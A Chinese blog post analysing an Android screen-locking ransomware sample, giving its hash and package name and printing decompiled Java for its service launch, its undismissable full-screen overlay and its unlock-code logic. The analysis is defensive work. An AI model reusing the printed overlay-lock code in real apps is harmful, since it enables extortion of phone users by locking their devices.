Android病毒样本分析(2)

最新推荐文章于 2023-04-28 12:49:15 发布

ireader135

最新推荐文章于 2023-04-28 12:49:15 发布

阅读量1.1k

点赞数

本文链接：https://blog.csdn.net/ireader135/article/details/65444117

版权

1.基本信息

病毒名称: a.privacy.fakeccb.a

文件名称: BWM在线

文件MD5: E32377EE18BF0D853D5B45DEDFB6997D

文件包名: com.qqquanquan1031606149

危害属性: 恶意勒索

2.基本行为

程序启动后直接锁屏，以勒索用户

3.详细分析

1、在入口函数内启动服务

try
    {
      paramView = Class.forName("com.qqquanquan1031606149.s");   //启动服务，文件名为"s"
      startService(new Intent(this, paramView));
      return;
    }

2、利用WindowManager.LayoutParams的flags属性，通过addView方法实现一个悬浮窗,设置WindowManager.LayoutParams的flags属性，例如：

"FLAG_FULLSCREEN"、"FLAG_LAYOUT_IN_SCREEN"配合"SYSTEM_ALERT_WINDOW"权限，使这个悬浮窗全屏置顶且无法清除，造成手机屏幕无法正常使用。

 private void createFloatView()
  {
    this.wmParams = new WindowManager.LayoutParams();
    Application localApplication = getApplication();
    getApplication();
    this.mWindowManager = ((WindowManager)localApplication.getSystemService(Context.WINDOW_SERVICE));
    this.wmParams.type = 2010;
    this.wmParams.format = 1;
    this.wmParams.flags = 1280;         //此处修改为了1280
    this.wmParams.gravity = 49;
    this.wmParams.x = 0;
    this.wmParams.y = 0;
    this.wmParams.width = -1;
    this.wmParams.height = -1;
    this.mFloatLayout = LayoutInflater.from(getApplication()).inflate(2130903041, (ViewGroup)null);
    this.mWindowManager.addView(this.mFloatLayout, this.wmParams);
    this.bt = ((Button)this.mFloatLayout.findViewById(2131165190));
    this.ed = ((EditText)this.mFloatLayout.findViewById(2131165189));
    this.tv = ((TextView)this.mFloatLayout.findViewById(2131165187));
    this.bt.setOnClickListener(new View.OnClickListener()

3、在处理解除锁屏密码时，作者加入异常处理函数，只有在触发异常后，才能够实现解锁

this.tv.setText("解锁随机码" + this.ppss);   //ppss即为解锁码

public void onCreate()
  {
    LogCatBroadcaster.start(this);
    super.onCreate();
    this.pass = ((Math.random() * 10000000));
    this.passw = ((int)(Math.random() * 1000000));
    this.share = getSharedPreferences("QQ1031606149", 0);
    this.editor = this.share.edit();
    if (isNetworkConnected(getApplicationContext()))   //判读是否有网络连接，没有网络连接时，给ppss赋值，即为解锁码
    {
      if (this.share.getLong("m", 0) == 0)
      {
        this.editor.putLong("m", this.pass);
        this.editor.commit();
      }
      try
      {
        this.editor.commit();
        label126:
        this.ppss = (this.share.getLong("m", 8) + "");
        new Thread()
        {
          public void run() {}
        }.start();
        return;
      }
      catch (Exception localException1)
      {
        break label126;
      }
    }
    try
    {
      this.ppss = "831524";
    }
    catch (Exception localException2)
    {
      for (;;)
      {
        try
        {
          this.password = "第六感是我爷爷";
          return;
        }
        catch (Exception localException3) {}
        localException2 = localException2;
      }
    }
  }